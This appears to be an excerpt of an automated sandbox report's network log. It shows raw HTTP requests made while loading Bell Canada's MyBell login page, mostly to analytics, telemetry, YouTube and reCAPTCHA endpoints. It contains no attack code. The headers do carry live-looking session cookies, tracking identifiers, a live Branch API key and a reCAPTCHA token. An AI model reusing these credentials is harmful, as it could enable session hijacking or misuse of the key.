Source: global trafficHTTP traffic detected: GET /i/14028/693653/c.json HTTP/1.1Host: collection.decibelinsight.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Origin: https://mybell.bell.caSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://mybell.bell.ca/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: da_lid=-B7D567C29E92EA123347BB99E4B686613C|0|0|0; da_sid=84E654F18AD2AE89A616AA13A6B4CC6A8F.1|3|0|3If-None-Match: W/012546114-192E2B478BB
Source: global trafficHTTP traffic detected: GET /egw/5/qceuv8449dzg58ptt1bhda9g8ue19c7s/track/__cool.gif?data=eyJldmVudHMiOiBbCiAgICB7InNlc3Npb25fc2NyZWVuX3NpemUiOiAiMTI4MHgxMDI0Iiwic2Vzc2lvbl9kdWEiOiAiTW96aWxsYS81LjAgKFdpbmRvd3MgTlQgMTAuMDsgV2luNjQ7IHg2NCkgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgQ2hyb21lLzExNy4wLjAuMCBTYWZhcmkvNTM3LjM2Iiwic2Vzc2lvbl9wbGF0Zm9ybSI6ICJXaW4zMiIsInBhZ2VfdGl0bGUiOiAiTG9nIGluIHRvIE15QmVsbCIsInBhZ2VfdXJsIjogImh0dHBzOi8vbXliZWxsLmJlbGwuY2EvTG9naW4/bGFuZ3VhZ2U9ZW4iLCJ0cmFja2VyX3R5cGUiOiAiamF2YXNjcmlwdCIsInRyYWNrZXJfdmVyc2lvbiI6ICIyLjIuMjMiLCJldmVudF9uYW1lIjogInNlc3Npb25fc3RhcnQiLCJldmVudF90aW1lc3RhbXBfZXBvY2giOiAiMTczMDM4MDM1MTM2NSIsImV2ZW50X3RpbWV6b25lX29mZnNldCI6IC00LCJ1c2VyX2lkIjogIjE5MmUyYjRjNzdhNjRkLTA4ZDNlOGUyNGFiOGRjLTI2MDMxZTUxLTE0MDAwMC0xOTJlMmI0Yzc3YjY0ZiIsInVybCI6ICJodHRwczovL215YmVsbC5iZWxsLmNhL0xvZ2luP2xhbmd1YWdlPWVuIiwiZm9ybUlkIjogbnVsbCwiZm9ybVRyaWdnZXJUeXBlIjogbnVsbCwia2FtcHlsZV9kYXRhIjogeyJtZF9pc1N1cnZleVN1Ym1pdHRlZEluU2Vzc2lvbiI6ICIiLCJMQVNUX0lOVklUQVRJT05fVklFVyI6ICIiLCJERUNMSU5FRF9EQVRFIjogIiIsImthbXB5bGVJbnZpdGVQcmVzZW50ZWQiOiAiIiwia2FtcHlsZV91c2VyaWQiOiAiYTc5Ny05OGZmLTE4ZmYtOWNkNS0wNmRkLTRiZmYtMzRkMi1hYmI5Iiwia2FtcHlsZVVzZXJTZXNzaW9uIjogIjE3MzAzODAzNTEzNjIiLCJrYW1weWxlVXNlclBlcmNlbnRpbGUiOiAiIiwiU1VCTUlUVEVEX0RBVEUiOiAiIn0sImNvb2tpZV9zaXplIjogMjcxOSwia2FtcHlsZV92ZXJzaW9uIjogIjIuNTcuMCIsIm9uc2l0ZV92ZXJzaW9uIjogIjIuNTcuMCIsImhpc3RvcnlfbGVuZ3RoIjogMSwiZXZlbnRfbG9jYWxfdGltZXN0YW1wIjogMTczMDM4MDM1MTM2NSwicG9zaXRpb24iOiBudWxsLCJpc1VzZXJJZGVudGlmaWVkIjogZmFsc2V9Cl19 HTTP/1.1Host: udc-neb.kampyle.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://mybell.bell.ca/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /_r?sdk=web2.85.0&_t=1380522052703713689&branch_key=key_live_adAu45V2R6wos7hoIYdA7flfytp07fPD&callback=branch_callback__4 HTTP/1.1Host: app.linkConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://mybell.bell.ca/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _s=bSIHRGqn9rL3nJ2hRxT4ssO5k%2FFjfBiEcV6oWbASilINqVOmeni4p8hvKqSbWcOb
Source: global trafficHTTP traffic detected: GET /_r?sdk=web2.85.0&_t=1380522052703713689&branch_key=key_live_adAu45V2R6wos7hoIYdA7flfytp07fPD&callback=branch_callback__5 HTTP/1.1Host: app.linkConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://mybell.bell.ca/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _s=bSIHRGqn9rL3nJ2hRxT4ssO5k%2FFjfBiEcV6oWbASilINqVOmeni4p8hvKqSbWcOb
Source: global trafficHTTP traffic detected: GET /rules/rule701951v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule701950v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule700850v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule700851v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /static/bell_common.js?async HTTP/1.1Host: mybell.bell.caConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: 8D711C5DA4B3704F0A5FE8ED0DB141222DFC87ED6AFE3A6E5F0F7DA8B5953F07F9198C1C7587982AE5FDA2B721188A3A=false; FPID=074d78d6-7e50-4974-a9af-c4727a62784e; FPID_2=074d78d6-7e50-4974-a9af-c4727a62784e; SessionCk=e60da217-072c-41c7-969e-7adbf82ba8be; InActivityCK=d0bb8c90-fdf6-4cf3-8894-a30039ae3a23; ConsistentActivityCK=d0bb8c90-fdf6-4cf3-8894-a30039ae3a23; OmniturePageName=Login:; __eccomp=; dtCookie=v_4_srv_8_sn_20124DC10D36CDE3D1C555C55D40CA36_perc_100000_ol_0_mul_1_app-3A429b1eac4514c5ce_1_rcs-3Acss_0; CAD_Bell_ca_SS=967776428.47873.0000; Qjja3xkGs7=3789514188.64288.0000; TLTSID=759A09CF47C23CE7804C25098E01FFA8; TLTUID=26A0122B5E2EB3DDD5D9EB8E4F02EA98; rxVisitor=17303803184158NV4F74O1KFTJ2EO5K4UAGQSTA0OEH7F; dtSa=-; __cwaf=true; ASP.NET_SessionId=xekfkxdqg0g3hnhhj5c40x2j; at_check=true; AMCVS_48B034FA53CF9FD10A490D44%40AdobeOrg=1; AKA_A2=A; zone=zone=&city=Killeen&pcd=&isp=&ispconnectiontype=; TLP020a4695=028702b9c9c05a52921ccf3c31971699d213c39112484a31e547d2c2ffd38687ed59a36d0d4e2c0fc94de624e710b589015e25b0a3d820fda1dd28f1c1d871dd22fc12e6551b85cc0f44234e0afad0602c52a8cfebcfcf76961c87bb9de0e4034f922fa52610cf06c4bd0238fec9db15133395a516b29fc258302c7437258fc2b9533f20552b7afc5e2687b7696ede3c85851dd344ebbe563d42f62457d7f06efc569272c8603ab277efb2634e0358dfc98b74cf5c; AMCV_48B034FA53CF9FD10A490D44%40AdobeOrg=179643557%7CMCIDTS%7C20028%7CMCMID%7C26404690240998747124274156036452379072%7CMCAAMLH-1730985129%7C6%7CMCAAMB-1730985129%7C6G1ynYcLPuiQxYZrsz_pkqfLG9yMXBpb2zX5dvJdYQJzPXImdj0y%7CMCOPTOUT-1730387529s%7CNONE%7CMCSYNCSOP%7C411-20035%7CvVersion%7C5.5.0; da_sid=84E654F18AD2AE89A616AA13A6B4CC6A8F.1|3|0|3; da_lid=B7D567C29E92EA123347BB99E4B686613C|0|0|0; da_intState=; s_cc=true; gemini=region=ON|language=en|province=ON|LarSegmentType=undefined; _gcl_au=1.1.441004151.1730380345; BSCC=LoginSplashReturnURL=%2fLogin%3f_branch_match_id%3d1380522052703713689%26_branch_referrer%3dH4sIAAAAAAAAA8soKSkottLXz9VLSs3J0UtO1C8uLSjILyopKkzOT0m1rytKTUstKsrMS49PKsovL04tsnXOKMrPTQUAvip8pzkAAAA%253D; TLP025e8c23=028702b9c9692b4dde036b6f48311953767db06bb285a115a62dcd733137452f4305eb2ab8d3f82b8b13ae85a95e4a91df25ba1c29da432a12f8fa973d6859ab4b9bf95d3d7ea5f56b8892bb8e17037a1f126e985c999dbd1d07c44d5ec8afaf2f6bb844bb17f3c07a5a7f83cd49351c2a911a5ca947d27a817d368faf54ae7e50a1842d2b57eac716f3ff3d0a55c9e8e128aa760d11afd37cabc7f1a9c13b24f5f873137471b379be7b6e2d795395816a5e8e1f2e418f6d39798439073d7d47d8e5abb89ebedced3714008024baabac0c69bb2b73489c2f92cfe3f6a21e9266ad18a9c7cb790e717910a9e948fabaca8f62d40d2453a6de990f7f33c7a1d85b4a989e357ccfff80ec2e3cb27aa1f5a73d036513baa2d2abdce10e77339c62a8affda7f305fa37c0ac2205be35ede10778493b15
Source: global trafficHTTP traffic detected: GET /rb_bced360d-a02a-4b73-b0e7-46fe5ae1dc34?type=js3&sn=v_4_srv_8_sn_20124DC10D36CDE3D1C555C55D40CA36_perc_100000_ol_0_mul_1_app-3A429b1eac4514c5ce_1_rcs-3Acss_0&svrid=8&flavor=post&vi=OSRWPKERGJKLBVFCIANBBATQHLJBBKCA-0&modifiedSince=1730276476420&rf=https%3A%2F%2Fmybell.bell.ca%2FLogin%3Flanguage%3Den&bp=3&app=429b1eac4514c5ce&crc=506127639&en=gticcd0a&end=1 HTTP/1.1Host: mybell.bell.caConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: 8D711C5DA4B3704F0A5FE8ED0DB141222DFC87ED6AFE3A6E5F0F7DA8B5953F07F9198C1C7587982AE5FDA2B721188A3A=false; FPID=074d78d6-7e50-4974-a9af-c4727a62784e; FPID_2=074d78d6-7e50-4974-a9af-c4727a62784e; SessionCk=e60da217-072c-41c7-969e-7adbf82ba8be; InActivityCK=d0bb8c90-fdf6-4cf3-8894-a30039ae3a23; ConsistentActivityCK=d0bb8c90-fdf6-4cf3-8894-a30039ae3a23; OmniturePageName=Login:; __eccomp=; dtCookie=v_4_srv_8_sn_20124DC10D36CDE3D1C555C55D40CA36_perc_100000_ol_0_mul_1_app-3A429b1eac4514c5ce_1_rcs-3Acss_0; CAD_Bell_ca_SS=967776428.47873.0000; Qjja3xkGs7=3789514188.64288.0000; TLTSID=759A09CF47C23CE7804C25098E01FFA8; TLTUID=26A0122B5E2EB3DDD5D9EB8E4F02EA98; rxVisitor=17303803184158NV4F74O1KFTJ2EO5K4UAGQSTA0OEH7F; dtSa=-; __cwaf=true; ASP.NET_SessionId=xekfkxdqg0g3hnhhj5c40x2j; at_check=true; AMCVS_48B034FA53CF9FD10A490D44%40AdobeOrg=1; AKA_A2=A; zone=zone=&city=Killeen&pcd=&isp=&ispconnectiontype=; TLP020a4695=028702b9c9c05a52921ccf3c31971699d213c39112484a31e547d2c2ffd38687ed59a36d0d4e2c0fc94de624e710b589015e25b0a3d820fda1dd28f1c1d871dd22fc12e6551b85cc0f44234e0afad0602c52a8cfebcfcf76961c87bb9de0e4034f922fa52610cf06c4bd0238fec9db15133395a516b29fc258302c7437258fc2b9533f20552b7afc5e2687b7696ede3c85851dd344ebbe563d42f62457d7f06efc569272c8603ab277efb2634e0358dfc98b74cf5c; AMCV_48B034FA53CF9FD10A490D44%40AdobeOrg=179643557%7CMCIDTS%7C20028%7CMCMID%7C26404690240998747124274156036452379072%7CMCAAMLH-1730985129%7C6%7CMCAAMB-1730985129%7C6G1ynYcLPuiQxYZrsz_pkqfLG9yMXBpb2zX5dvJdYQJzPXImdj0y%7CMCOPTOUT-1730387529s%7CNONE%7CMCSYNCSOP%7C411-20035%7CvVersion%7C5.5.0; da_sid=84E654F18AD2AE89A616AA13A6B4CC6A8F.1|3|0|3; da_lid=B7D567C29E92EA123347BB99E4B686613C|0|0|0; da_intState=; s_cc=true; gemini=region=ON|language=en|province=ON|LarSegmentType=undefined; _gcl_au=1.1.441004151.1730380345; BSCC=LoginSplashReturnURL=%2fLogin%3f_branch_match_id%3d1380522052703713689%26_branch_referrer%3dH4sIAAAAAAAAA8soKSkottLXz9VLSs3J0UtO1C8uLSjILyopKkzOT0m1rytKTUstKsrMS49PKsovL04tsnXOKMrPTQUAvip8pzkAAAA%253D; TLP025e8c23=028702b9c9692b4dde036b6f48311953767db06bb285a115a62dcd733137452f4305eb2ab8d3f82b8b13ae85a95e4a91df25ba1c29da432a12f8fa973d6859ab4b9bf95d3d7ea5f56b8892bb8e17037a1f126e985c999dbd1d07c44d5ec8afaf2f6bb844bb17f3c07a5a7f83cd49351c2a911a5ca947d27a817d368faf54ae7e50a1842d2b57eac716f3ff3d0a55c9
Source: global trafficHTTP traffic detected: GET /rb_bced360d-a02a-4b73-b0e7-46fe5ae1dc34?type=js3&sn=v_4_srv_8_sn_20124DC10D36CDE3D1C555C55D40CA36_perc_100000_ol_0_mul_1_app-3A429b1eac4514c5ce_1_rcs-3Acss_0&svrid=8&flavor=post&vi=OSRWPKERGJKLBVFCIANBBATQHLJBBKCA-0&modifiedSince=1730276476420&rf=https%3A%2F%2Fmybell.bell.ca%2FLogin%3Flanguage%3Den&bp=3&app=429b1eac4514c5ce&crc=3627224120&en=gticcd0a&end=1 HTTP/1.1Host: mybell.bell.caConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: 8D711C5DA4B3704F0A5FE8ED0DB141222DFC87ED6AFE3A6E5F0F7DA8B5953F07F9198C1C7587982AE5FDA2B721188A3A=false; FPID=074d78d6-7e50-4974-a9af-c4727a62784e; FPID_2=074d78d6-7e50-4974-a9af-c4727a62784e; SessionCk=e60da217-072c-41c7-969e-7adbf82ba8be; InActivityCK=d0bb8c90-fdf6-4cf3-8894-a30039ae3a23; ConsistentActivityCK=d0bb8c90-fdf6-4cf3-8894-a30039ae3a23; OmniturePageName=Login:; __eccomp=; dtCookie=v_4_srv_8_sn_20124DC10D36CDE3D1C555C55D40CA36_perc_100000_ol_0_mul_1_app-3A429b1eac4514c5ce_1_rcs-3Acss_0; CAD_Bell_ca_SS=967776428.47873.0000; Qjja3xkGs7=3789514188.64288.0000; TLTSID=759A09CF47C23CE7804C25098E01FFA8; TLTUID=26A0122B5E2EB3DDD5D9EB8E4F02EA98; rxVisitor=17303803184158NV4F74O1KFTJ2EO5K4UAGQSTA0OEH7F; dtSa=-; __cwaf=true; ASP.NET_SessionId=xekfkxdqg0g3hnhhj5c40x2j; at_check=true; AMCVS_48B034FA53CF9FD10A490D44%40AdobeOrg=1; AKA_A2=A; zone=zone=&city=Killeen&pcd=&isp=&ispconnectiontype=; TLP020a4695=028702b9c9c05a52921ccf3c31971699d213c39112484a31e547d2c2ffd38687ed59a36d0d4e2c0fc94de624e710b589015e25b0a3d820fda1dd28f1c1d871dd22fc12e6551b85cc0f44234e0afad0602c52a8cfebcfcf76961c87bb9de0e4034f922fa52610cf06c4bd0238fec9db15133395a516b29fc258302c7437258fc2b9533f20552b7afc5e2687b7696ede3c85851dd344ebbe563d42f62457d7f06efc569272c8603ab277efb2634e0358dfc98b74cf5c; AMCV_48B034FA53CF9FD10A490D44%40AdobeOrg=179643557%7CMCIDTS%7C20028%7CMCMID%7C26404690240998747124274156036452379072%7CMCAAMLH-1730985129%7C6%7CMCAAMB-1730985129%7C6G1ynYcLPuiQxYZrsz_pkqfLG9yMXBpb2zX5dvJdYQJzPXImdj0y%7CMCOPTOUT-1730387529s%7CNONE%7CMCSYNCSOP%7C411-20035%7CvVersion%7C5.5.0; da_sid=84E654F18AD2AE89A616AA13A6B4CC6A8F.1|3|0|3; da_lid=B7D567C29E92EA123347BB99E4B686613C|0|0|0; da_intState=; s_cc=true; gemini=region=ON|language=en|province=ON|LarSegmentType=undefined; _gcl_au=1.1.441004151.1730380345; BSCC=LoginSplashReturnURL=%2fLogin%3f_branch_match_id%3d1380522052703713689%26_branch_referrer%3dH4sIAAAAAAAAA8soKSkottLXz9VLSs3J0UtO1C8uLSjILyopKkzOT0m1rytKTUstKsrMS49PKsovL04tsnXOKMrPTQUAvip8pzkAAAA%253D; TLP025e8c23=028702b9c9692b4dde036b6f48311953767db06bb285a115a62dcd733137452f4305eb2ab8d3f82b8b13ae85a95e4a91df25ba1c29da432a12f8fa973d6859ab4b9bf95d3d7ea5f56b8892bb8e17037a1f126e985c999dbd1d07c44d5ec8afaf2f6bb844bb17f3c07a5a7f83cd49351c2a911a5ca947d27a817d368faf54ae7e50a1842d2b57eac716f3ff3d0a55c
Source: global trafficHTTP traffic detected: GET /rules/rule701850v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule701851v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule703050v3s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule703051v3s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /i/14028/da/?type=page&wid=693653&sid=84E654F18AD2AE89A616AA13A6B4CC6A8F&jspsf=1&pvid=1730380341691&dc=1&dv=1&dl=397&retryCode=socketNotConnected HTTP/1.1Host: collection.decibelinsight.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: da_lid=-B7D567C29E92EA123347BB99E4B686613C|0|0|0; da_sid=84E654F18AD2AE89A616AA13A6B4CC6A8F.1|3|0|3
Source: global trafficHTTP traffic detected: GET /i/14028/da/?type=multi&wid=693653&sid=84E654F18AD2AE89A616AA13A6B4CC6A8F&jspsf=1&pvid=1730380341691&dc=2&dv=1&dl=1130&retryCode=socketNotConnected HTTP/1.1Host: collection.decibelinsight.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: da_lid=-B7D567C29E92EA123347BB99E4B686613C|0|0|0; da_sid=84E654F18AD2AE89A616AA13A6B4CC6A8F.1|3|0|3
Source: global trafficHTTP traffic detected: GET /_r?sdk=web2.85.0&_t=1380522052703713689&branch_key=key_live_adAu45V2R6wos7hoIYdA7flfytp07fPD&callback=branch_callback__6 HTTP/1.1Host: app.linkConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://mybell.bell.ca/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _s=bSIHRGqn9rL3nJ2hRxT4ssO5k%2FFjfBiEcV6oWbASilINqVOmeni4p8hvKqSbWcOb
Source: global trafficHTTP traffic detected: GET /_r?sdk=web2.85.0&_t=1380522052703713689&branch_key=key_live_adAu45V2R6wos7hoIYdA7flfytp07fPD&callback=branch_callback__7 HTTP/1.1Host: app.linkConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://mybell.bell.ca/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _s=bSIHRGqn9rL3nJ2hRxT4ssO5k%2FFjfBiEcV6oWbASilINqVOmeni4p8hvKqSbWcOb
Source: global trafficHTTP traffic detected: GET /i/14028/da/?type=multi&wid=693653&sid=84E654F18AD2AE89A616AA13A6B4CC6A8F&jspsf=1&pvid=1730380341691&dc=3&dv=1&dl=886&retryCode=socketNotConnected HTTP/1.1Host: collection.decibelinsight.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: da_lid=-B7D567C29E92EA123347BB99E4B686613C|0|0|0; da_sid=84E654F18AD2AE89A616AA13A6B4CC6A8F.1|3|0|3
Source: global trafficHTTP traffic detected: GET /_r?sdk=web2.85.0&_t=1380522052703713689&branch_key=key_live_adAu45V2R6wos7hoIYdA7flfytp07fPD&callback=branch_callback__8 HTTP/1.1Host: app.linkConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://mybell.bell.ca/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _s=bSIHRGqn9rL3nJ2hRxT4ssO5k%2FFjfBiEcV6oWbASilINqVOmeni4p8hvKqSbWcOb
Source: global trafficHTTP traffic detected: GET /i/14028/da/?type=multi&wid=693653&sid=84E654F18AD2AE89A616AA13A6B4CC6A8F&jspsf=1&pvid=1730380341691&dc=4&dv=1&dl=129&retryCode=socketNotConnected HTTP/1.1Host: collection.decibelinsight.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: da_lid=-B7D567C29E92EA123347BB99E4B686613C|0|0|0; da_sid=84E654F18AD2AE89A616AA13A6B4CC6A8F.1|3|0|3
Source: global trafficHTTP traffic detected: GET /iframe_api HTTP/1.1Host: www.youtube.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*X-Client-Data: CIu2yQEIo7bJAQipncoBCNT9ygEIkqHLAQiFoM0BCLnKzQEIidPNAQip1c0BGOmYzQEY642lFw==Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /wdccan/36793/onsite/embed.js HTTP/1.1Host: resources.digital-cloud.medallia.caConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://mybell.bell.ca/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9If-None-Match: "ab480182e18a16841a9028d8857825bb"If-Modified-Since: Wed, 30 Oct 2024 09:03:40 GMT
Source: global trafficHTTP traffic detected: GET /i/14028/da/?type=multi&wid=693653&sid=84E654F18AD2AE89A616AA13A6B4CC6A8F&jspsf=1&pvid=1730380341691&dc=5&dv=1&dl=387&retryCode=socketNotConnected HTTP/1.1Host: collection.decibelinsight.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: da_lid=-B7D567C29E92EA123347BB99E4B686613C|0|0|0; da_sid=84E654F18AD2AE89A616AA13A6B4CC6A8F.1|3|0|3
Source: global trafficHTTP traffic detected: GET /recaptcha/enterprise/reload?k=6LeIfTIaAAAAAHMPXsezv4PdsckDc-wAJU-eo2YP HTTP/1.1Host: www.google.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*X-Client-Data: CIu2yQEIo7bJAQipncoBCNT9ygEIkqHLAQiFoM0BCLnKzQEIidPNAQip1c0BGOmYzQEY642lFw==Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _GRECAPTCHA=09ANOXeZxfxzYBwcz7Gnvqu3Y83ZbiHyue1AJYczF16kXnMrYQu4vUb1Eg9Z0jpwvMDzXecLZHMeVchD3odA4owgc
